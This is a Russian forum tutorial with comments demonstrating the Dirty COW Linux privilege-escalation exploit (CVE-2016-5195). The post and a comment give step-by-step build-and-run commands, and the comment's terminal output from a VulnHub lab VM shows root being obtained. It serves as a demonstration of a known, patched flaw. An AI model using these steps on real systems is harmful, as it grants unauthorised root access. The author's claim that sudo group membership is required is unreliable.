• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Dirty Cow Exploit

Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 291
Привет! В этой статье я хочу показать новый вид уязвимости, которой, подвержены, как пишут специалисты по информационной безопасности, все, без исключения ядра Linux на сегодняшний день. С её помощью локальный пользователь может повысить свои привилегии до root, из-за ошибки состязания в реализации механизма копирования при записи (COW) для страниц памяти, помеченных флагом dirty, при условии, что мы состоим в группе sudo/wheel (FreeBSD). По официальным данным, опубликованным 20.10.2016 года, уязвимость CVE-2016-5195, получившая имя Dirty COW, существовала в ядре Linux, начиная с версии 2.6.22 с 2007 года. Исследователь Фил Остер обнаруживший проблему, уже уведомил RedHat о том, что недавно эксплоит для данной уязвимости был использован в ходе реальных атак. Такие вот дела в мире Linux:) Попробуем проэкплойтить нашу систему.

Dirty Cow Exploit


Переходим по адресу:

Dirty Cow Exploit


И скачиваем архив:

Dirty Cow Exploit


Затем распакуем его в папку локального пользователя, в моем случае /home/necro

Dirty Cow Exploit


Залогинившись под пользователем necro, перейдем в его домашний каталог:

> su necro

> cd ~

Затем перейдем в папку, куда мы распаковывали архив.

> cd CVE-2016-5195-master

> sudo –s make

Все должно пройти без ошибок.

> sudo –s ./dcow

Dirty Cow Exploit


Вводим свой пароль, и пытаемся получить root-доступ, используя тот пароль, который нам подсказывает Dirty Cow:

> su

Вводим его и становимся root!

Dirty Cow Exploit


P.S. На скачанной вчера Debian, эксплоит уже не работает:) Так, что наверное не все так плохо.
Пруф -
 
K

koldonuuchu

Active member
04.11.2016
36
46
Пофиксили уже значит)
 
Konstantin

Konstantin

Member
12.11.2016
8
2
Почему через минуту, после получения прав root, комп наглухо виснит?
 
  • Нравится
Реакции: Vander
Konstantin

Konstantin

Member
12.11.2016
8
2
У меня в kali, но не на виртуалке.
 
  • Нравится
Реакции: Vander
A

arbaiten

Member
03.12.2017
13
7
Bash:
webmin@VulnOSv2:~/CVE-2016-5195-master$ ls
changelog  CONTRIBUTING.md  dcow.cpp  golang  legacy  makefile  README.md  version
webmin@VulnOSv2:~/CVE-2016-5195-master$ sudo -s make
[sudo] password for webmin:
webmin is not in the sudoers file.  This incident will be reported.
webmin@VulnOSv2:~/CVE-2016-5195-master$ make
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
webmin@VulnOSv2:~/CVE-2016-5195-master$ ls -l
total 80
-rw-rw-r-- 1 webmin webmin  1591 Mar 21  2017 changelog
-rw-rw-r-- 1 webmin webmin   947 Mar 21  2017 CONTRIBUTING.md
-rwxrwxr-x 1 webmin webmin 40159 Jun  1 14:44 dcow
-rw-rw-r-- 1 webmin webmin 10092 Mar 21  2017 dcow.cpp
drwxrwxr-x 3 webmin webmin  4096 Mar 21  2017 golang
drwxrwxr-x 2 webmin webmin  4096 Mar 21  2017 legacy
-rw-rw-r-- 1 webmin webmin   143 Mar 21  2017 makefile
-rw-rw-r-- 1 webmin webmin  2807 Mar 21  2017 README.md
-rw-rw-r-- 1 webmin webmin     7 Mar 21  2017 version
webmin@VulnOSv2:~/CVE-2016-5195-master$ ./dcow
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
webmin@VulnOSv2:~/CVE-2016-5195-master$ su root
Password:
root@VulnOSv2:/home/webmin/CVE-2016-5195-master# id
uid=0(root) gid=0(root) groups=0(root)
На VM с Vulnhub отработала

Bash:
root@VulnOSv2:/home/webmin/CVE-2016-5195-master# uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
root@VulnOSv2:/home/webmin/CVE-2016-5195-master# lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 14.04.4 LTS
Release:    14.04
Codename:    trusty
 
Мы в соцсетях: